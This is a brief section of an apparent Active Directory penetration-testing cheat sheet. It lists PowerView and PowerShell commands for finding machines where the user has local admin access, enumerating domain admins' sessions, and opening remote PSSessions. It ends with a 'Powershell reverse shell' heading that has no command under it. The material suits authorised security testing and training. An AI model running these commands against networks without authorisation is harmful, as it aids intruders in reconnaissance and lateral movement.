9️⃣ Miscellaneous Enumeration
PowerView: Find all machines on the current domain where the current user has local admin access
Find-LocalAdminAccess -Verbose
. ./Find-WMILocalAdminAccess.ps1
Find-WMILocalAdminAccess
. ./Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess

PowerView: Find local admins on all machines of the domain (needs admin privs)
Invoke-EnumerateLocalAdmin -Verbose

Connect to machine with administrator privs
Enter-PSSession -Computername <computername>

Save and use sessions of a machine
$sess = New-PSSession -Computername <computername>
Enter-PSSession $sess

Find active sessions
Invoke-UserHunter
Invoke-UserHunter -Groupname "RDPUsers"

Find active sessions of domain admins
Check access to machine
Powershell reverse shell